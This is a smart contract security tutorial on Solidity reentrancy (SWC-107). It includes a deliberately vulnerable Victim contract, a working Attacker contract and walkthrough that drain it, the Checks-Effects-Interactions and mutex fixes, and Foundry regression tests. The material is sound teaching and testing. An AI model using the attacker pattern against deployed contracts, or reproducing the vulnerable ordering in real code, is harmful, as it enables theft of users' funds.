Smart Contract Security: Reentrancy Attack (SWC-107 Reentrancy)
2022-08-02 23:33:00 [Johnathan]
Attack name
Reentrancy
Attack classification
CWE-841 (Improper Enforcement of Behavioral Workflow): the code's actual execution order does not match the behavior the developer intended. In the SWC registry this weakness is listed as SWC-107.
Attack description
The main risk is that calling an external contract hands control of the execution flow to that contract. Any transfer of Ether to an address with code (`msg.sender.call{value: ...}("")`, `transfer`, `send`) runs the recipient's fallback or receive function, and that function can do anything, including calling back into the contract that is still in the middle of executing. In a reentrancy attack the malicious contract calls the victim again before the victim's first function call has finished, so state that the first call has not yet updated (here, the caller's balance) is read again as if it were still valid, and the function's behavior diverges from what was intended. The core flow and principle are illustrated by the contracts below.
Contract case
Victim contract (deliberately vulnerable: the external call happens before the balance is updated)

```solidity
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.6.10;

contract Victim {
    mapping(address => uint256) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) public {
        require(balances[msg.sender] >= amount);
        // Interaction before effect: control passes to msg.sender here,
        // while balances[msg.sender] still holds the pre-withdrawal value.
        (bool success,) = msg.sender.call{value: amount}("");
        require(success, "Fail to send ether!");
        // Only now is the balance reduced. In 0.6.x this subtraction is
        // unchecked, so the repeated decrements during the attack silently wrap.
        balances[msg.sender] -= amount;
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}
```

Attacker contract

```solidity
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.6.10;

contract Attacker {
    Victim public victim;

    constructor(address _victimAddr) public {
        victim = Victim(_victimAddr);
    }

    // Deposit 1 ETH so the require in withdraw() passes, then start the withdrawal.
    function beginAttack() external payable {
        require(msg.value >= 1 ether);
        victim.deposit{value: 1 ether}();
        victim.withdraw(1 ether);
    }

    // Called by Victim.withdraw() when it sends Ether. Re-enter withdraw()
    // while Victim still believes our balance is 1 ETH.
    fallback() external payable {
        // Stop once the victim cannot pay another 1 ETH. Without this guard the
        // final transfer would fail, and the revert would unwind the whole
        // transaction, so the attacker would not get a single wei.
        if (address(victim).balance >= 1 ether) {
            victim.withdraw(1 ether);
        }
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}
```
Walkthrough
- In Remix, deploy the Victim contract from account 1, then call deposit with 4 ETH.
- Deploy the Attacker contract from account 1 (passing the Victim address), then call beginAttack with 1 ETH.
- Result: Victim getBalance returns 0, Attacker getBalance returns 5. The attacker deposited 1 ETH and withdrew it five times before the first withdraw() reached the line that reduces its balance.
Prevention
- Swap the order of the storage update and the external call so that the condition the attacker relies on (a stale balance) no longer exists when control leaves the contract. This is the Checks-Effects-Interactions pattern: validate inputs (checks), update state (effects), and only then call out (interactions).

```solidity
contract Victim {
    // ...
    function withdraw(uint256 amount) public {
        require(balances[msg.sender] >= amount);          // check
        balances[msg.sender] -= amount;                    // effect
        (bool success,) = msg.sender.call{value: amount}(""); // interaction
        require(success, "Fail to send ether!");
    }
}
```

- Add a reentrancy lock (mutex). A modifier sets a flag on entry and clears it on exit; a nested call into any function guarded by the modifier fails the `require` and reverts, which in turn makes the outer external call fail.

```solidity
bool internal locked;

modifier noReentrant() {
    require(!locked, "No re-entrancy!");
    locked = true;
    _;
    locked = false;
}

function withdraw(uint256 amount) public noReentrant {
    require(balances[msg.sender] >= amount);
    (bool success,) = msg.sender.call{value: amount}("");
    require(success, "Fail to send ether!");
    balances[msg.sender] -= amount;
}
```

The lock stops the re-entry on its own, but it only protects functions that carry the modifier and it costs extra storage writes per call, so it should be used in addition to Checks-Effects-Interactions, not instead of it. Note also that this article's example depends on Solidity 0.6.x unchecked arithmetic: under 0.8.x the repeated `balances[msg.sender] -= amount` would underflow, panic and revert the whole attack transaction, although the underlying ordering bug, and variants such as setting the balance to zero after the call, remain exploitable.
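To check both the attack above and the two mitigations mechanically rather than by hand in Remix, here is an added Foundry test that is not part of the original post. The contract names VulnerableBank, HardenedBank, IBank and Reenterer are this example's own; it assumes a standard Foundry project where forge-std is available at the `forge-std/Test.sol` import path and is run with `forge test`. VulnerableBank reproduces the Victim ordering (and uses `unchecked` to mimic the 0.6.x wrap-around under a 0.8.x compiler); HardenedBank combines Checks-Effects-Interactions with the lock.

```solidity
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.13;

import "forge-std/Test.sol";

interface IBank {
    function deposit() external payable;
    function withdraw(uint256 amount) external;
}

// Same ordering bug as the Victim contract: interaction before effect.
contract VulnerableBank is IBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount);
        (bool success,) = msg.sender.call{value: amount}("");
        require(success, "Fail to send ether!");
        // unchecked reproduces Solidity 0.6's silent wrap-around; with checked
        // arithmetic the decrements during unwinding would panic and revert everything.
        unchecked { balances[msg.sender] -= amount; }
    }
}

// Checks-Effects-Interactions plus a reentrancy lock.
contract HardenedBank is IBank {
    mapping(address => uint256) public balances;
    bool internal locked;

    modifier noReentrant() {
        require(!locked, "No re-entrancy!");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external noReentrant {
        require(balances[msg.sender] >= amount);              // check
        balances[msg.sender] -= amount;                        // effect
        (bool success,) = msg.sender.call{value: amount}(""); // interaction
        require(success, "Fail to send ether!");
    }
}

// Re-enters withdraw() from receive(), like the article's Attacker does from fallback().
contract Reenterer {
    IBank public bank;

    constructor(IBank _bank) { bank = _bank; }

    function beginAttack() external payable {
        require(msg.value >= 1 ether);
        bank.deposit{value: 1 ether}();
        bank.withdraw(1 ether);
    }

    receive() external payable {
        if (address(bank).balance >= 1 ether) {
            bank.withdraw(1 ether);
        }
    }
}

contract ReentrancyTest is Test {
    function setUp() public {
        vm.deal(address(this), 10 ether); // funds for the deposit and the attack
    }

    function testDrainsVulnerableBank() public {
        VulnerableBank bank = new VulnerableBank();
        bank.deposit{value: 4 ether}(); // honest funds, as in the Remix walkthrough
        Reenterer attacker = new Reenterer(bank);

        attacker.beginAttack{value: 1 ether}();

        assertEq(address(bank).balance, 0);
        assertEq(address(attacker).balance, 5 ether);
    }

    function testHardenedBankRevertsReentry() public {
        HardenedBank bank = new HardenedBank();
        bank.deposit{value: 4 ether}();
        Reenterer attacker = new Reenterer(bank);

        // Nested withdraw hits the lock, receive() reverts, the outer call returns
        // false, and the outer withdraw's require reverts the whole transaction.
        vm.expectRevert(bytes("Fail to send ether!"));
        attacker.beginAttack{value: 1 ether}();

        assertEq(address(bank).balance, 4 ether); // deposit and attack both rolled back
        assertEq(address(attacker).balance, 0);
    }
}
```

The second test is the useful one in practice: an attacker contract that re-enters is the cheapest regression test for this class of bug, and with the hardened contract the failure shows up as a revert of the attacker's own transaction, with the victim's funds untouched. Running the same attacker against a contract that only zeroes the balance after the call (the classic variant) would still drain it, because the lock, not checked arithmetic, is what stops the re-entry.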